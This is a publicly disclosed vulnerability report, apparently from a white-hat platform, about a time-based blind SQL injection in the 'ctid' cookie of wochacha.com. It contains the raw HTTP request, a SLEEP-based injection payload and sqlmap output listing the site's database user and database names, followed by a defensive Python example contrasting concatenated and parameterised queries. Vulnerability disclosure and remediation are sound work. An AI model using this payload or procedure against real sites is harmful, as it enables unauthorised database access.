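2015-08-17: Details reported to the vendor; awaiting vendor handling
2015-08-21: Vendor confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and experts in related fields
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to trainee white hats
2015-10-05: Details disclosed to the public
After finishing testing, I found that this had already been submitted before; some of the issues have been fixed, but one has not.
1. Capture the request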
GET http://www.wochacha.com/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.wochacha.com/interface_getbasecity.html
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Accept-Encoding: gzip, deflate
Host: www.wochacha.com
Connection: Keep-Alive
Cookie: wccid=ae0a273167dc2bfe1f57fc208ca28e7b; ctid=2; ctname=%E5%8C%97%E4%BA%AC%E5%B8%82; Hm_lvt_f03a6dc050c95205501bd6f3ef63834c=1439689089; Hm_lpvt_f03a6dc050c95205501bd6f3ef63834c=1439689145; top_banner=2015%2F8%2F16
The ctid cookie is injectable; wccid and ctname have already been fixed.
2. sqlmap test
sqlmap identified the following injection points with a total of 1205 HTTP(s) requests:
---
Place: Cookie
Parameter: ctid
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: wccid=362ac98c111996f2257a9c8eacb0c4f0; ctid=2%' AND SLEEP(5) AND '%'='; ctname=%E5%8C%97%E4%BA%AC%E5%B8%82; Hm_lvt_f03a6dc050c95205501bd6f3ef63834c=1439689089; Hm_lpvt_f03a6dc050c95205501bd6f3ef63834c=1439689145; top_banner=2015/8/16
---
[10:15:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[10:21:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[10:21:34] [INFO] fetching current user
[10:21:34] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[10:21:34] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:21:43] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:22:09] [INFO] heuristics detected web page charset 'ascii'
[10:22:09] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
a
current user: 'a'
[10:33:17] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[10:33:17] [INFO] fetching current database
[10:33:17] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[10:33:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:33:28] [INFO] heuristics detected web page charset 'ascii'
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y
[10:33:30] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[10:33:42] [INFO] adjusting time delay to 2 seconds due to good response times
[10:33:47] [ERROR] invalid character detected. retrying..
[10:33:47] [WARNING] increasing time delay to 3 seconds
s
[10:34:22] [ERROR] invalid character detected. retrying..
[10:34:22] [WARNING] increasing time delay to 4 seconds
e
[10:34:59] [ERROR] invalid character detected. retrying..
[10:34:59] [WARNING] increasing time delay to 5 seconds
cu
[10:36:09] [ERROR] invalid character detected. retrying..
[10:36:09] [WARNING] increasing time delay to 6 seconds
rity
[10:38:14] [ERROR] invalid character detected. retrying..
[10:38:14] [WARNING] increasing time delay to 7 seconds
current database: 'security'
[10:40:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[10:40:33] [INFO] fetching database names
[10:40:33] [INFO] fetching number of databases
[10:40:33] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[10:40:33] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[10:40:40] [INFO] heuristics detected web page charset 'ascii'
[10:40:40] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y
1
[10:40:59] [INFO] adjusting time delay to 2 seconds due to good response times
0
[10:41:01] [INFO] retrieved: inf
[10:42:08] [ERROR] invalid character detected. retrying..
[10:42:08] [WARNING] increasing time delay to 3 seconds
[10:42:25] [ERROR] invalid character detected. retrying..
[10:42:25] [WARNING] increasing time delay to 4 seconds
o
[10:43:23] [ERROR] invalid character detected. retrying..
[10:43:23] [WARNING] increasing time delay to 5 seconds
rmati
[10:45:47] [ERROR] invalid character detected. retrying..
[10:45:47] [WARNING] increasing time delay to 6 seconds
o
[10:46:48] [ERROR] invalid character detected. retrying..
[10:46:48] [WARNING] increasing time delay to 7 seconds
[10:47:16] [ERROR] unable to properly validate last character value ('q')..
q_
[10:47:53] [ERROR] invalid character detected. retrying..
[10:47:53] [WARNING] increasing time delay to 3 seconds
sch
[10:48:55] [ERROR] invalid character detected. retrying..
[10:48:55] [WARNING] increasing time delay to 4 seconds
ema
[10:49:46] [INFO] retrieved: gcore
[10:51:28] [INFO] retrieved: gc
[10:53:00] [ERROR] invalid character detected. retrying..
[10:53:00] [WARNING] increasing time delay to 5 seconds
oreinc
[10:55:26] [INFO] retrieved: mysq
[10:57:29] [ERROR] invalid character detected. retrying..
[10:57:29] [WARNING] increasing time delay to 6 seconds
l
[10:58:08] [INFO] retrieved:
[10:58:40] [ERROR] invalid character detected. retrying..
[10:58:40] [WARNING] increasing time delay to 7 seconds
[10:59:15] [ERROR] unable to properly validate last character value ('y')..
yecurity
[11:00:40] [ERROR] invalid character detected. retrying..
[11:00:40] [WARNING] increasing time delay to 3 seconds
[11:00:43] [INFO] retrieved: te
[11:01:44] [ERROR] invalid character detected. retrying..
[11:01:44] [WARNING] increasing time delay to 4 seconds
s
[11:02:27] [ERROR] invalid character detected. retrying..
[11:02:27] [WARNING] increasing time delay to 5 seconds
t
[11:03:15] [ERROR] invalid character detected. retrying..
[11:03:15] [WARNING] increasing time delay to 6 seconds
[11:03:26] [ERROR] invalid character detected. retrying..
[11:03:26] [WARNING] increasing time delay to 7 seconds
[11:03:29] [INFO] retrieved: thi
[11:05:49] [ERROR] unable to properly validate last character value ('y')..
ydapp
[11:06:51] [INFO] retrieved: t
[11:07:18] [ERROR] invalid character detected. retrying..
[11:07:18] [WARNING] increasing time delay to 3 seconds
rap
[11:08:17] [ERROR] invalid character detected. retrying..
[11:08:17] [WARNING] increasing time delay to 4 seconds
[11:08:33] [ERROR] invalid character detected. retrying..
[11:08:33] [WARNING] increasing time delay to 5 seconds
[11:08:36] [INFO] retrieved: wc
[11:09:51] [ERROR] invalid character detected. retrying..
[11:09:51] [WARNING] increasing time delay to 6 seconds
c
[11:10:23] [ERROR] invalid character detected. retrying..
[11:10:23] [WARNING] increasing time delay to 7 seconds
[11:10:26] [INFO] retrieved:
[11:11:13] [ERROR] unable to properly validate last character value ('|')..
|ab
[11:11:46] [ERROR] invalid character detected. retrying..
[11:11:46] [WARNING] increasing time delay to 3 seconds
bix
available databases [10]:
[*] `|abbix`
[*] gcore
[*] gcoreinc
[*] informatioq_schema
[*] mysql
[*] test
[*] thiydapp
[*] trap
[*] wcc
[*] yecurity
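The network was not very good, so there were some timing errors, and I did not continue!~~~
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-08-21 14:55
Fix in progress
None yet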
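
Added example (not part of the original report or the vendor's code): the ctid value from the sqlmap "Payload:" line above, run through a string-concatenated query and through a bound-parameter query with an allow-list check. The LIKE query shape, the `city` table and the use of SQLite in place of MySQL are assumptions made so the example runs offline.

```python
import re
import sqlite3

# ctid value copied from the sqlmap "Payload:" line on this page; the rest is constructed.
COOKIE = "wccid=362ac98c111996f2257a9c8eacb0c4f0; ctid=2%' AND SLEEP(5) AND '%'='; top_banner=2015/8/16"

def cookie_value(header, name):
    """Return the raw value of one cookie; split on the first '=' only."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def make_db():
    # Hypothetical city table standing in for the real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE city (id TEXT, name TEXT)")
    db.executemany("INSERT INTO city VALUES (?, ?)", [("1", "Shanghai"), ("2", "Beijing")])
    return db

def lookup_concat(db, ctid):
    # 'Before' form (assumed): cookie text is spliced into a LIKE pattern.
    return db.execute("SELECT name FROM city WHERE id LIKE '%" + ctid + "%'").fetchall()

def lookup_bound(db, ctid):
    # Bound parameter: the driver sends ctid as data, never as SQL text.
    return db.execute("SELECT name FROM city WHERE id = ?", (ctid,)).fetchall()

def valid_ctid(ctid):
    # Allow-list check: a city id is a short run of ASCII digits.
    return bool(re.fullmatch(r"[0-9]{1,6}", ctid or ""))

def demo():
    db = make_db()
    ctid = cookie_value(COOKIE, "ctid")
    try:
        lookup_concat(db, ctid)
        concat = "executed"
    except sqlite3.OperationalError as exc:
        concat = str(exc)  # the parser reached SLEEP( as SQL; SQLite has no such function
    return concat, lookup_bound(db, ctid), valid_ctid(ctid)

if __name__ == "__main__":
    print(demo())
```

The concatenated query fails only because SQLite lacks SLEEP(), which shows the cookie text was parsed as SQL; the bound query treats the same text as a literal and matches no rows.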